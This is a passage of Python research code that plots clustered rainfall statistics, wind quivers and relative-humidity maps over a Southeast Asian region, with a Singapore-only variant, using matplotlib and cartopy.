# terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
zero_to_ten = plt.cm.pink(np.linspace(1, .2, 3))
eleven_to_25 = plt.cm.gist_earth(np.linspace(0.75, 0.2, 5))
twnty5_to_40 = plt.cm.gist_stern(np.linspace(0.3, 0.1, 5))
all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Proportion of grid with >50 mm of rainfall (heavy rain), over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
for clus in range(optimal_k):
time.sleep(1); gc.collect()
data = get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus=clus)
# data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).sel(
# lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
# ddata_pred_proba_morethan50mm = np.mean([data.isel(time=t).precipitationCal.T.values > 50 for t in range(data.time.size)], axis=0)
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('white')
ax_rf_plot.add_feature(cf.LAND, facecolor='silver')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.3, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.3, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, ddata_pred_proba_morethan50mm,
np.linspace(0,1,101),
cmap=terrain_map,
extend='max')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >50 mm rainfall (over 1)', orientation='horizontal', pad=0.01)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_heavy_gt50mm_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_90th_percentile_plots(model, dest, optimal_k):
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting 90th of rainfall over grids now.\nTotal of {optimal_k} clusters, now printing cluster: ')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
# labels_ar = utils.open_pickle(model.labels_ar_path)
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
# zero_to_ten = plt.cm.pink(np.linspace(1, .2, 3))
# eleven_to_25 = plt.cm.gist_earth(np.linspace(0.75, 0.3, 5))
# twnty5_to_40 = plt.cm.gnuplot2(np.linspace(0.4, .9, 5))
# all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
# terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
z = plt.cm.gist_stern(np.linspace(1, .9, 1))
a = plt.cm.terrain(np.linspace(0.6, .1, 4))
b = plt.cm.gnuplot2(np.linspace(0.4, .9, 12))
all_colors = np.vstack((z, a, b))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'90th percentile RF over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
# for clus in range(len(np.unique(labels_ar))):
for i, clus in enumerate([i for i in np.unique(RFprec_to_ClusterLabels_dataset.cluster) if not np.isnan(i)]):
time.sleep(1); gc.collect()
data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).sel(
lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N)).precipitationCal.values
data_gt1mm = np.ma.masked_where(data<=1, data)
percen_90 = np.percentile(data_gt1mm, 90, axis=0).T
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[i], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('white')
ax_rf_plot.add_feature(cf.LAND, facecolor='silver')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.8, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, percen_90,
# np.linspace(0,100,21),
np.arange(0,500,12.5),
cmap=terrain_map,
extend='max')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Rainfall (mm)', orientation='horizontal', pad=0.01,
ticks=np.arange(0,500,50))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_90th_percentile_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_quiver_plots(model, dest, optimal_k):
quiverstarttime = timer(); print(f"{utils.time_now()} - Drawing quiver sub-plots now...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
# skip_interval = 3
# lon_qp = model.X[::skip_interval].values
# lat_qp = model.Y[::skip_interval].values
area = (model.LON_E-model.LON_W)*(model.LAT_N-model.LAT_S)
coastline_lw = .8
minshaft=2; scale=33
if area > 3000: skip_interval=4; coastline_lw=.4
elif 2000 < area <= 3000: skip_interval=3; coastline_lw=.6
elif 500 < area <= 2000 : skip_interval=2; minshaft=3; scale=33
else: skip_interval=1; minshaft=3; scale=33
# skip_interval = 1 #7 April: seems to be trouble reconciling regional + entire extent quivers
lon_qp = model.X[::skip_interval].values
lat_qp = model.Y[::skip_interval].values
# minshaft=.2; scale=250
for idx, pressure in enumerate(model.uwnd_vwnd_pressure_lvls):
print(f'Currently on {pressure}hpa...')
fig, gs_qp = create_multisubplot_axes(optimal_k)
for cluster in range(optimal_k):
print(f"{utils.time_now()} - Cluster {cluster}: ")
# uwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
# target_ds_withClusterLabels.cluster==cluster, drop=True).uwnd.mean(
# "time")[::skip_interval, ::skip_interval].values
# vwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
# target_ds_withClusterLabels.cluster==cluster, drop=True).vwnd.mean(
# "time")[::skip_interval, ::skip_interval].values
uwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).uwnd.mean(
"time").values
vwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).vwnd.mean(
"time").values
ax_qp = fig.add_subplot(gs_qp[cluster], projection=ccrs.PlateCarree())
ax_qp.xaxis.set_major_formatter(model.lon_formatter)
ax_qp.yaxis.set_major_formatter(model.lat_formatter)
ax_qp.set_facecolor('white')
ax_qp.add_feature(cf.LAND,facecolor='white')
ax_qp.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
if cluster < model.grid_width: # top ticks
ax_qp.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_qp.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_qp.xaxis.tick_top()
else: ax_qp.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_qp.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_qp.yaxis.set_label_position("right")
ax_qp.yaxis.tick_right()
else: ax_qp.set_yticks([])
if cluster == 0: # title
ax_qp.set_title(f"Pressure: {pressure} hpa,\ncluster no.{cluster+1}", loc='left')
else: ax_qp.set_title(f"cluster no.{cluster+1}", loc='left')
time.sleep(1); gc.collect()
# wndspd = np.hypot(vwnd_gridded_centroids,uwnd_gridded_centroids)
wndspd = np.hypot(vwnd_gridded_centroids,uwnd_gridded_centroids)[::skip_interval,::skip_interval]
time.sleep(1); gc.collect()
# u = uwnd_gridded_centroids/wndspd;
# v = vwnd_gridded_centroids/wndspd;
u = uwnd_gridded_centroids[::skip_interval,::skip_interval]/wndspd
v = vwnd_gridded_centroids[::skip_interval,::skip_interval]/wndspd
spd_plot = ax_qp.contourf(lon_qp, lat_qp, wndspd, np.linspace(0,18,19),
transform=ccrs.PlateCarree(), cmap='terrain_r',
alpha=1)
Quiver = ax_qp.quiver(lon_qp, lat_qp, u, v, color='Black', minshaft=minshaft, scale=scale)
conts = ax_qp.contour(spd_plot, 'w', linewidths=.3)
ax_qp.coastlines("50m", linewidth=coastline_lw, color='orangered')
ax_qp.add_feature(cf.BORDERS, linewidth=.35, color='orangered', linestyle='dashed')
ax_qp.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=5)
time.sleep(1); gc.collect()
if cluster == model.cbar_pos: # cbar
axins_qp = inset_axes(ax_qp, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_qp.transAxes)
cbar_qp = fig.colorbar(spd_plot, cax=axins_qp, label='Quiver (m/s)', orientation='horizontal',pad=0.01)
cbar_qp.ax.xaxis.set_ticks_position('top')
cbar_qp.ax.xaxis.set_label_position('top')
print(f"=> Quiver plots plotted for {pressure}hpa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_qp_v5-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nQuiver plotting took {utils.time_since(quiverstarttime)}.\n\n")
def print_quiver_ANOM_whole(model, dest, optimal_k):
quiverstarttime = timer(); print(f'{utils.time_now()} - Finishing quiver ANOMALY plots (whole)...')
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
area = (model.LON_E-model.LON_W)*(model.LAT_N-model.LAT_S)
coastline_lw = .8
minshaft=2; scale=33
if area > 3000: skip_interval=4
elif 2000 < area <= 3000: skip_interval=3; coastline_lw=.6
elif 500 < area <= 2000 : skip_interval=2; minshaft=3; scale=33
else: skip_interval=1; minshaft=3; scale=33
# lon_qp = model.X[::skip_interval].values
# lat_qp = model.Y[::skip_interval].values
lon = target_ds_withClusterLabels.lon[::skip_interval]
lat = target_ds_withClusterLabels.lat[::skip_interval]
w = lon.min().data
e = lon.max().data
s = lat.min().data
n = lat.max().data
levels = [int(i) for i in np.linspace(-10,10,21)]
for idx, pressure in enumerate(model.uwnd_vwnd_pressure_lvls):
print(f'Currently on {pressure}hpa...')
fig, gs_qp = create_multisubplot_axes(optimal_k)
# uwnd_baseline = target_ds_withClusterLabels.sel(level=pressure).uwnd.mean("time")[::skip_interval, ::skip_interval].values
# vwnd_baseline = target_ds_withClusterLabels.sel(level=pressure).vwnd.mean("time")[::skip_interval, ::skip_interval].values
uwnd_baseline = target_ds_withClusterLabels.sel(level=pressure).uwnd.mean("time").values
vwnd_baseline = target_ds_withClusterLabels.sel(level=pressure).vwnd.mean("time").values
for cluster in range(optimal_k):
print(f"{utils.time_now()} - Cluster {cluster}: ")
# uwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
# target_ds_withClusterLabels.cluster==cluster, drop=True).uwnd.mean(
# "time")[::skip_interval, ::skip_interval].values
# vwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
# target_ds_withClusterLabels.cluster==cluster, drop=True).vwnd.mean(
# "time")[::skip_interval, ::skip_interval].values
uwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).uwnd.mean(
"time").values
vwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).vwnd.mean(
"time").values
uwnd_mean = uwnd_gridded_centroids - uwnd_baseline
vwnd_mean = vwnd_gridded_centroids - vwnd_baseline
ax_qp = fig.add_subplot(gs_qp[cluster], projection=ccrs.PlateCarree())
ax_qp.xaxis.set_major_formatter(model.lon_formatter)
ax_qp.yaxis.set_major_formatter(model.lat_formatter)
ax_qp.set_facecolor('white')
ax_qp.add_feature(cf.LAND,facecolor='silver')
ax_qp.set_extent([w,e,s,n])
if cluster < model.grid_width: # top ticks
ax_qp.set_xticks(np.linspace(w,e, 5), crs=ccrs.PlateCarree())
ax_qp.set_xticklabels(np.linspace(w,e, 5), rotation=55)
ax_qp.xaxis.tick_top()
else: ax_qp.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_qp.set_yticks(np.linspace(s,n, 5), crs=ccrs.PlateCarree())
ax_qp.yaxis.set_label_position("right")
ax_qp.yaxis.tick_right()
else: ax_qp.set_yticks([])
if cluster == 0: # title
ax_qp.set_title(f"Pressure: {pressure} hpa for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\ncluster no.{cluster+1}", loc='left')
else: ax_qp.set_title(f"cluster no.{cluster+1}", loc='left')
time.sleep(1); gc.collect()
wndspd = np.hypot(vwnd_mean,uwnd_mean);
# wndspd = np.hypot(vwnd_gridded_centroids,uwnd_gridded_centroids)
# u = uwnd_gridded_centroids[::skip_interval,::skip_interval]/wndspd
# v = vwnd_gridded_centroids[::skip_interval,::skip_interval]/wndspd
u = uwnd_mean/wndspd;
v = vwnd_mean/wndspd;
wndspd = wndspd[::skip_interval,::skip_interval]
u = u[::skip_interval,::skip_interval]
v = v[::skip_interval,::skip_interval]
spd_plot = ax_qp.contourf(lon, lat, wndspd, levels,
transform=ccrs.PlateCarree(), cmap='terrain_r',
alpha=1)
Quiver = ax_qp.quiver(lon, lat, u, v, color='Black', minshaft=minshaft, scale=scale)
conts = ax_qp.contour(spd_plot, 'w', linewidths=.3)
ax_qp.coastlines("50m", linewidth=coastline_lw, color='orangered')
ax_qp.add_feature(cf.BORDERS, linewidth=.35, color='orangered', linestyle='dashed')
ax_qp.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=5)
time.sleep(1); gc.collect()
if cluster == model.cbar_pos: # cbar
axins_qp = inset_axes(ax_qp, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_qp.transAxes)
cbar_qp = fig.colorbar(spd_plot, cax=axins_qp, label='Quiver (m/s)', orientation='horizontal',pad=0.01,
ticks=levels)
cbar_qp.ax.xaxis.set_ticks_position('top')
cbar_qp.ax.xaxis.set_label_position('top')
print(f"=> Quiver ANOMALY plots plotted for {pressure}hpa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_qp_v1_ANOM-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nQuiver ANOMALY plotting took {utils.time_since(quiverstarttime)}.\n\n")
def print_quiver_plots_sgonly(model, dest, optimal_k):
quiverstarttime = timer(); print(f"{utils.time_now()} - Drawing quiver sub-plots (sgonly) now...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
w_lim_sg = 101
e_lim_sg = 107
s_lim_sg = -1
n_lim_sg = 4
target_ds_withClusterLabels = target_ds_withClusterLabels.sel(
lon=slice(w_lim_sg, e_lim_sg),lat=slice(n_lim_sg, s_lim_sg))
# area = (model.LON_E-model.LON_W)*(model.LAT_N-model.LAT_S)
coastline_lw = 1
# minshaft=2; scale=33
# if area > 3000: skip_interval=4
# elif 2000 < area <= 3000: skip_interval=3
# elif 500 < area <= 2000 : skip_interval=2; minshaft=3; scale=33
# else: skip_interval=1; minshaft=3; scale=33
skip_interval=1; minshaft=3; scale=10
lon_qp = target_ds_withClusterLabels.lon[::skip_interval].values
lat_qp = target_ds_withClusterLabels.lat[::skip_interval].values
# w = lon_qp.min()
# e = lon_qp.max()
# s = lat_qp.min()
# n = lat_qp.max()
w = 102
e = 105
s = 0.5
n = 2
for idx, pressure in enumerate(model.uwnd_vwnd_pressure_lvls):
print(f'Currently on {pressure}hpa...')
fig, gs_qp = create_multisubplot_axes(optimal_k)
for cluster in range(optimal_k):
print(f"{utils.time_now()} - Cluster {cluster}: ")
uwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).uwnd.mean(
"time")[::skip_interval, ::skip_interval].values
vwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).vwnd.mean(
"time")[::skip_interval, ::skip_interval].values
ax_qp = fig.add_subplot(gs_qp[cluster], projection=ccrs.PlateCarree())
ax_qp.xaxis.set_major_formatter(model.lon_formatter)
ax_qp.yaxis.set_major_formatter(model.lat_formatter)
ax_qp.set_facecolor('white')
ax_qp.add_feature(cf.LAND,facecolor='silver')
# ax_qp.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
# ax_qp.set_extent([103, 105, 0.5, 2])
ax_qp.set_extent([w, e, s, n])
if cluster < model.grid_width: # top ticks
ax_qp.set_xticks([w,e], crs=ccrs.PlateCarree())
ax_qp.set_xticklabels([w,e], rotation=55)
ax_qp.xaxis.tick_top()
else: ax_qp.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_qp.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_qp.yaxis.set_label_position("right")
ax_qp.yaxis.tick_right()
else: ax_qp.set_yticks([])
if cluster == 0: # title
ax_qp.set_title(f"Pressure: {pressure} hpa,\ncluster no.{cluster+1}", loc='left')
else: ax_qp.set_title(f"cluster no.{cluster+1}", loc='left')
time.sleep(1); gc.collect()
wndspd = np.hypot(vwnd_gridded_centroids,uwnd_gridded_centroids);
time.sleep(1); gc.collect()
u = uwnd_gridded_centroids/wndspd;
v = vwnd_gridded_centroids/wndspd;
spd_plot = ax_qp.contourf(lon_qp, lat_qp, wndspd, np.linspace(0,18,19),
transform=ccrs.PlateCarree(), cmap='terrain_r',
alpha=1)
Quiver = ax_qp.quiver(lon_qp, lat_qp, u, v, color='Black', minshaft=minshaft, scale=scale)
conts = ax_qp.contour(spd_plot, 'w', linewidths=.3)
ax_qp.coastlines("50m", linewidth=coastline_lw, color='aqua')
ax_qp.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_qp.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=5)
time.sleep(1); gc.collect()
if cluster == model.cbar_pos: # cbar
axins_qp = inset_axes(ax_qp, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_qp.transAxes)
cbar_qp = fig.colorbar(spd_plot, cax=axins_qp, label='Quiver (m/s)', orientation='horizontal',pad=0.01)
cbar_qp.ax.xaxis.set_ticks_position('top')
cbar_qp.ax.xaxis.set_label_position('top')
print(f"=> Quiver plots plotted for {pressure}hpa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_qp_sgonly-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nQuiver plotting took {utils.time_since(quiverstarttime)}.\n\n")
def print_rhum_plots(model, dest, optimal_k):
rhumstarttime = timer(); print(f"{utils.time_now()} - Finishing RHUM plots...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
for idx, pressure in enumerate(model.rhum_pressure_levels):
fig, gs_rhum = create_multisubplot_axes(optimal_k)
for cluster in range(optimal_k):
rhum_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).rhum.mean("time")
ax_rhum = fig.add_subplot(gs_rhum[cluster], projection=ccrs.PlateCarree())
ax_rhum.xaxis.set_major_formatter(model.lon_formatter)
ax_rhum.yaxis.set_major_formatter(model.lat_formatter)
ax_rhum.coastlines("50m", linewidth=.7, color='w')
ax_rhum.add_feature(cf.BORDERS, linewidth=.5, color='w', linestyle='dashed')
ax_rhum.set_facecolor('white')
ax_rhum.add_feature(cf.LAND, facecolor='k')
ax_rhum.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
if cluster < model.grid_width: # top ticks
ax_rhum.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_rhum.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rhum.xaxis.tick_top()
else: ax_rhum.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_rhum.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_rhum.yaxis.set_label_position("right")
ax_rhum.yaxis.tick_right()
else: ax_rhum.set_yticks([])
if cluster == 0: # title
ax_rhum.set_title(f"Pressure: {pressure} hpa,\ncluster no.{cluster+1}", loc='left')
else: ax_rhum.set_title(f"cluster no.{cluster+1}", loc='left')
normi = mpl.colors.Normalize(vmin=model.min_maxes['rhum_min'], vmax=model.min_maxes['rhum_max']);
Rhum = ax_rhum.contourf(model.X, model.Y, rhum_gridded_centroids,
np.linspace(model.min_maxes['rhum_min'], model.min_maxes['rhum_max'], 21),
norm=normi, cmap='jet_r')
conts = ax_rhum.contour(Rhum, 'k:', linewidths=.5)
ax_rhum.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=10)
if cluster == model.cbar_pos: # cbar
axins_rhum = inset_axes(ax_rhum, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rhum.transAxes);
cbar_rhum = fig.colorbar(Rhum, cax=axins_rhum, label='Relative humidity (%)', orientation='horizontal', pad=0.01);
cbar_rhum.ax.xaxis.set_ticks_position('top')
cbar_rhum.ax.xaxis.set_label_position('top')
print(f"{utils.time_now()} - clus {cluster}")
print(f"==> Rhum plots plotted for {pressure}hpa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_rhum_v3-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nTime taken to plot RHUM: {utils.time_since(rhumstarttime)}.")
def print_rhum_plots_sgonly(model, dest, optimal_k):
rhumstarttime = timer(); print(f"{utils.time_now()} - Finishing RHUM plots...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
w_lim_sg = 101
e_lim_sg = 107
s_lim_sg = -1
n_lim_sg = 4
target_ds_withClusterLabels = target_ds_withClusterLabels.sel(
lon=slice(w_lim_sg, e_lim_sg),lat=slice(n_lim_sg, s_lim_sg))
w = 102
e = 105
s = 0.5
n = 2
for idx, pressure in enumerate(model.rhum_pressure_levels):
fig, gs_rhum = create_multisubplot_axes(optimal_k)
for cluster in range(optimal_k):
rhum_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).rhum.mean("time")
ax_rhum = fig.add_subplot(gs_rhum[cluster], projection=ccrs.PlateCarree())
ax_rhum.xaxis.set_major_formatter(model.lon_formatter)
ax_rhum.yaxis.set_major_formatter(model.lat_formatter)
ax_rhum.coastlines("50m", linewidth=.7, color='w')
ax_rhum.add_feature(cf.BORDERS, linewidth=.5, color='w', linestyle='dashed')
ax_rhum.set_facecolor('white')
ax_rhum.add_feature(cf.LAND, facecolor='k')
# ax_rhum.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rhum.set_extent([w, e, s, n])
if cluster < model.grid_width: # top ticks
ax_rhum.set_xticks([w,e], crs=ccrs.PlateCarree())
ax_rhum.set_xticklabels([w,e], rotation=55)
ax_rhum.xaxis.tick_top()
else: ax_rhum.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_rhum.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rhum.yaxis.set_label_position("right")
ax_rhum.yaxis.tick_right()
else: ax_rhum.set_yticks([])
if cluster == 0: # title
ax_rhum.set_title(f"Pressure: {pressure} hpa,\ncluster no.{cluster+1}", loc='left')
else: ax_rhum.set_title(f"cluster no.{cluster+1}", loc='left')
normi = mpl.colors.Normalize(vmin=model.min_maxes['rhum_min'], vmax=model.min_maxes['rhum_max']);
Rhum = ax_rhum.contourf(target_ds_withClusterLabels.lon, target_ds_withClusterLabels.lat, rhum_gridded_centroids,
np.linspace(model.min_maxes['rhum_min'], model.min_maxes['rhum_max'], 21),
norm=normi, cmap='jet_r')
conts = ax_rhum.contour(Rhum, 'k:', linewidths=.5)
ax_rhum.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=10)
if cluster == model.cbar_pos: # cbar
axins_rhum = inset_axes(ax_rhum, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rhum.transAxes);
cbar_rhum = fig.colorbar(Rhum, cax=axins_rhum, label='Relative humidity (%)', orientation='horizontal', pad=0.01);
cbar_rhum.ax.xaxis.set_ticks_position('top')
cbar_rhum.ax.xaxis.set_label_position('top')
print(f"{utils.time_now()} - clus {cluster}")
print(f"==> Rhum plots plotted for {pressure}hpa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_rhum_sgonly-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nTime taken to plot RHUM: {utils.time_since(rhumstarttime)}.")
def print_RHUM_ANOM_whole(model, dest, optimal_k):
rhumstarttime = timer(); print(f"{utils.time_now()} - Finishing RHUM ANOMALY plots (whole)...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
lon = target_ds_withClusterLabels.lon
lat = target_ds_withClusterLabels.lat
w = lon.min().data
e = lon.max().data
s = lat.min().data
n = lat.max().data
levels = [int(i) for i in np.linspace(-40,40,24)]
for idx, pressure in enumerate(model.rhum_pressure_levels):
pressure=700
